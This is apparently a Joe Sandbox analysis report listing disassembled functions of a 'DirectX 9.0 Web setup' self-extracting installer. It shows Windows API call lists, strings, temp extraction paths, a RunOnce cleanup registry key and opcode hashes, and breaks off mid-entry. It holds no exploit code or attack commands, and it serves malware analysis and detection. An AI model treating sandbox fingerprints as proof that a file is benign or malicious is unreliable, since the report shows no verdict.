                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectorylstrcpy
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 2574644873-1955631000
                                                                                                • Opcode ID: 93e692ac1587df938e33032a71ea2a0dccc3e90e8b89d3b20b57e192b1dc1fa6
                                                                                                • Instruction ID: 960ce29c7a69c0d0d6bd76a451a08647df6ffba3f75ce7ea97df57adcc28d351
                                                                                                • Opcode Fuzzy Hash: 93e692ac1587df938e33032a71ea2a0dccc3e90e8b89d3b20b57e192b1dc1fa6
                                                                                                • Instruction Fuzzy Hash: DB11E27A500259DFFB73EF58E94C96577E8FB04340F45406EE2C052198CBBB9548CB50
                                                                                                Function 01002A34 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                • LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • FreeResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A97
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Find$FreeLoadLockSizeof
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 468261009-3102400635
                                                                                                • Opcode ID: 60513ed6fa868ebe5019eda0ed49016e3eb50df202396a8709f0f5900e5d54f2
                                                                                                • Instruction ID: b81af5958d1d79e739a71e668ea852868a10399b4e191fd1668772ccbe63b742
                                                                                                • Opcode Fuzzy Hash: 60513ed6fa868ebe5019eda0ed49016e3eb50df202396a8709f0f5900e5d54f2
                                                                                                • Instruction Fuzzy Hash: D301D631700148BBEB339B66AC88D7F7BADFB8A791F044019F986C7144CA768880DB61
                                                                                                Function 0100383D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,?), ref: 01003878
                                                                                                • GetDesktopWindow.USER32 ref: 01003882
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 01003898
                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 010038AA
                                                                                                • SetForegroundWindow.USER32(?), ref: 010038B1
                                                                                                • EndDialog.USER32(?,00000002), ref: 010038BE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 852535152-3102400635
                                                                                                • Opcode ID: 75a087d82200ebd705203d3342fd985e8dff23fa491e07dc86cdd8fdf240c47c
                                                                                                • Instruction ID: 5c13e9e4d6d24029a2895105e5d04483bb2c3333f3e538078e74f50813a3fb26
                                                                                                • Opcode Fuzzy Hash: 75a087d82200ebd705203d3342fd985e8dff23fa491e07dc86cdd8fdf240c47c
                                                                                                • Instruction Fuzzy Hash: 7E017C31510214AFFB675BA8D8089ED7B94FB05741F004891FAC2DA0C5CB7ACB41CBE0
                                                                                                Function 01002691 Relevance: 12.1, APIs: 8, Instructions: 123memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 010027EB
                                                                                                  • Part of subcall function 01002081: CharUpperA.USER32(?,00000001,?,00000000), ref: 010020A8
                                                                                                  • Part of subcall function 01002081: CharNextA.USER32(?), ref: 010020B7
                                                                                                  • Part of subcall function 01002081: CharNextA.USER32(00000000), ref: 010020BA
                                                                                                  • Part of subcall function 01002081: lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010020EA
                                                                                                  • Part of subcall function 01002081: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,00000000), ref: 01002110
                                                                                                  • Part of subcall function 01002081: RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?), ref: 01002133
                                                                                                  • Part of subcall function 01002081: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0100214E
                                                                                                  • Part of subcall function 01002081: lstrcpyA.KERNEL32(?,?), ref: 01002162
                                                                                                  • Part of subcall function 01002081: RegCloseKey.ADVAPI32(?), ref: 01002176
                                                                                                • GetFileVersionInfoSizeA.VERSION(?,?,?,00000001,?,?,?,?,00000104,?,?,?,?,?,?,?), ref: 010026EF
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,0000003C,?,0000003C,00000001,?,?,?,?,00000001,?,?,?,?,00000104), ref: 01002702
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 01002714
                                                                                                • GetFileVersionInfoA.VERSION(0000003C,?,?,00000000), ref: 0100272E
                                                                                                • VerQueryValueA.VERSION(00000000,0100132C,0000003C,0000003C,0000003C,?,?,00000000), ref: 01002745
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 010027AC
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 010027FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersionlstrcpy$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                • String ID:
                                                                                                • API String ID: 2416581039-0
                                                                                                • Opcode ID: d36b2cbb2bcf2f010609546f27dacd5adc000b5a5f889186ab3a9f49350142b4
                                                                                                • Instruction ID: 715b562a5a0b13aa3d3becab1fee66edbba7586ed49f21780c7e5d38fec6c3f0
                                                                                                • Opcode Fuzzy Hash: d36b2cbb2bcf2f010609546f27dacd5adc000b5a5f889186ab3a9f49350142b4
                                                                                                • Instruction Fuzzy Hash: 1B41717090020AEFEF12DF94CD88AEDBBF5FF44304F144069EA85A6591C7759980CF50
                                                                                                Function 01002ACD Relevance: 12.0, APIs: 8, Instructions: 42stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000104,?,?,?,01004972,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002ADB
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AE2
                                                                                                • lstrcpyA.KERNEL32(?,00000104,?,?,?,01004972,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AF8
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AFF
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B09
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B13
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B1A
                                                                                                • lstrcatA.KERNEL32(?,?,?,?,?,01004972,?,00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$lstrcatlstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2414487701-0
                                                                                                • Opcode ID: 7294cccf960f3f366eb54c5e099d3ec04d4912deaa84471d2f8e17bbbdc9ee5a
                                                                                                • Instruction ID: 5cb71324bf1073ba797ff75ade76f469c3bffa4559f515a1268d3d36d40ed6b7
                                                                                                • Opcode Fuzzy Hash: 7294cccf960f3f366eb54c5e099d3ec04d4912deaa84471d2f8e17bbbdc9ee5a
                                                                                                • Instruction Fuzzy Hash: 2701D63140829ABEEB23DF64DC48EAF3FE9DF4A310F044469F98492052CB75E0159BA1
                                                                                                Function 01002969 Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 0100297F
                                                                                                • GetWindowRect.USER32(010017FA,?), ref: 01002994
                                                                                                • GetDC.USER32(?), ref: 010029A8
                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 010029B4
                                                                                                • GetDeviceCaps.GDI32(010017FA,0000000A), ref: 010029C2
                                                                                                • ReleaseDC.USER32(?,010017FA), ref: 010029D1
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005), ref: 01002A27
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                • String ID:
                                                                                                • API String ID: 2212493051-0
                                                                                                • Opcode ID: e5b264a83dd9e846005674263491b2207fbfe43a598662fe0941c5ab6264e4cb
                                                                                                • Instruction ID: 4c28801afd84217de1cb5c416d2791a7d42eb7b966f216dd91684d3200acc53b
                                                                                                • Opcode Fuzzy Hash: e5b264a83dd9e846005674263491b2207fbfe43a598662fe0941c5ab6264e4cb
                                                                                                • Instruction Fuzzy Hash: 0B215932A0010AAFDF12CFBCCD899EEBBB9EB88310F008125F941E7254D735A9458B50
                                                                                                Function 01004481 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,LICENSE,00000000,00000000,?,00000000,?,0100592D,00000000,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 0100449B
                                                                                                • LocalFree.KERNEL32(00000000,000004B1,00000000,00000000,00000010,00000000,LICENSE,00000000,00000000,?,00000000,?,0100592D,00000000,01005A22,00000000), ref: 010044E8
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(771C4B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                • LocalFree.KERNEL32(?,00000000,?,0100592D,00000000,01005A22,00000000,01005ACB,?,?,01005ACB,00000000), ref: 0100454D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Local$ErrorFindFreeLast$AllocLoadLockMessageSizeof
                                                                                                • String ID: <None>$LICENSE
                                                                                                • API String ID: 3899723493-383193767
                                                                                                • Opcode ID: 9d552bdc682831cc17b8e5f489639f4026cf8ed1a791820ee76a1c03ef31662f
                                                                                                • Instruction ID: 6e0dad04b0308800c6e7bb6f83685405a54a227f071ddc6dc43be68e18665347
                                                                                                • Opcode Fuzzy Hash: 9d552bdc682831cc17b8e5f489639f4026cf8ed1a791820ee76a1c03ef31662f
                                                                                                • Instruction Fuzzy Hash: 791172B4600245BEF7236F21ACC4D7B366DE704399F018024B6C5D94C9DBBB8D408B34
                                                                                                Function 01001DDF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,?), ref: 01001DF7
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 01001E1D
                                                                                                • _lopen.KERNEL32(?,00000040), ref: 01001E2C
                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 01001E3D
                                                                                                • _lclose.KERNEL32(00000000), ref: 01001E46
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharDirectoryPrevPrivateProfileStringWindowsWrite_lclose_llseek_lopenlstrcpylstrlen
                                                                                                • String ID: wininit.ini
                                                                                                • API String ID: 1211533111-4206010578
                                                                                                • Opcode ID: f92e39143841338b23a30a7285bd343bbb73fc4a946f94324873422716c0777d
                                                                                                • Instruction ID: b7b4abcde96b08424be1b8ef761040528c423947c2d44bd333b95f446d3817fe
                                                                                                • Opcode Fuzzy Hash: f92e39143841338b23a30a7285bd343bbb73fc4a946f94324873422716c0777d
                                                                                                • Instruction Fuzzy Hash: BCF0AFB6600194A7E732E7799D8CEEB3ABCAB85710F000095B7D9E30C0D6B8C9458B70
                                                                                                Function 0100366A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 0100368D
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?), ref: 010036B8
                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 010036E2
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 010036FF
                                                                                                Strings
                                                                                                • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003675
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Filelstrcpy$CharCloseCreateHandlePrevWritelstrlen
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 3080743287-1955631000
                                                                                                • Opcode ID: f3c43e67ddf95b47fdb9e484ccd9ecd1a78d65d94e8c236f23dda56cc12f1390
                                                                                                • Instruction ID: 19b174ac764301658f5366c9defac34423b59d1cd1d6115009132bdfdfa86dce
                                                                                                • Opcode Fuzzy Hash: f3c43e67ddf95b47fdb9e484ccd9ecd1a78d65d94e8c236f23dda56cc12f1390
                                                                                                • Instruction Fuzzy Hash: 48114F71900218EBDB22DF55DC88EDE7F7CFB49760F108155F58596184C7B59A84CFA0
                                                                                                Function 01004161 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(00000000,?,00000005), ref: 01004170
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,01004E32,000007D6,00000000,010017B1,00000547,0000083E,?,?,00000000), ref: 0100417E
                                                                                                • DialogBoxIndirectParamA.USER32(00000000,00000000,?,0000083E,00000547), ref: 0100419D
                                                                                                • FreeResource.KERNEL32(00000000,?,01004E32,000007D6,00000000,010017B1,00000547,0000083E,?,?,00000000), ref: 010041A6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 1214682469-3102400635
                                                                                                • Opcode ID: e997d8be0718b2931c3f9f962151c7850337d5e5bb85679e49a3f60c032731a3
                                                                                                • Instruction ID: 90e970f1d2589a349edb739379ec95ef873ddad6063cdbf399ebe6a889d0bac2
                                                                                                • Opcode Fuzzy Hash: e997d8be0718b2931c3f9f962151c7850337d5e5bb85679e49a3f60c032731a3
                                                                                                • Instruction Fuzzy Hash: 21018172300219BFEB235FA9AC88DEF7AADEB553A4F014465FB81A6080C7758C5087E4
                                                                                                Function 0100370F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28librarystringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 01003724
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • GetFileAttributesA.KERNEL32(?,?,00000000), ref: 01003740
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0100375A
                                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 01003765
                                                                                                Strings
                                                                                                • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003718
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoadlstrcpy$AttributesCharFilePrevlstrlen
                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 4003292530-1955631000
                                                                                                • Opcode ID: 2a1abe798eeda10e1ecd94666a9ff7b2e6d0c61b8320ab0a73d9c68e693d9404
                                                                                                • Instruction ID: 9f94e3723cca4d266b99732e7a80262a7a37e234bfc11ab39ee7921fbbd2d32f
                                                                                                • Opcode Fuzzy Hash: 2a1abe798eeda10e1ecd94666a9ff7b2e6d0c61b8320ab0a73d9c68e693d9404
                                                                                                • Instruction Fuzzy Hash: E8F05EB4900608AFEB22AB64DE89EC97B68BB14305F404590F2C9E50C0D7B9E6898F50
                                                                                                Function 01001946 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,?,?,00000000,01002F6A,?,00000000), ref: 01001968
                                                                                                • RegDeleteValueA.ADVAPI32(?,wextract_cleanup0,?,00000000,01002F6A,?,00000000), ref: 0100197A
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,01002F6A,?,00000000), ref: 01001983
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                • API String ID: 849931509-702805525
                                                                                                • Opcode ID: 458768e2f170180f9e320fe5dbc18e42d63c941c0fb649dab67b6fa9c1c2255c
                                                                                                • Instruction ID: ccbb5ff6748fd46fc05444b67dc659029424084cb7ec84c162ec529ad60e6887
                                                                                                • Opcode Fuzzy Hash: 458768e2f170180f9e320fe5dbc18e42d63c941c0fb649dab67b6fa9c1c2255c
                                                                                                • Instruction Fuzzy Hash: D3E04F30740358FBF733CB959D0EF697AACA700788F100058F2C1A1095D7F6D5009714
                                                                                                Function 01004657 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 57memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,FINISHMSG,00000000,00000000,?,00000000,?,?,010059FB), ref: 01004672
                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,?,?,010059FB), ref: 010046C9
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2505716823.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.2505418642.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2505988293.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.2506287728.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLocal$AllocFreeLoadLockMessageSizeof
                                                                                                • String ID: <None>$FINISHMSG
                                                                                                • API String ID: 1166655539-3091758298
                                                                                                • Opcode ID: 9fc84565805aa23d4fd31d628d8c3b998d3dee3f2991ba92e449fc6c41aa1772
                                                                                                • Instruction ID: c5b0bc608187105c25715251356598fe5d23ec77e1943fddc57e6d3d47a5b5c3
                                                                                                • Opcode Fuzzy Hash: 9fc84565805aa23d4fd31d628d8c3b998d3dee3f2991ba92e449fc6c41aa1772
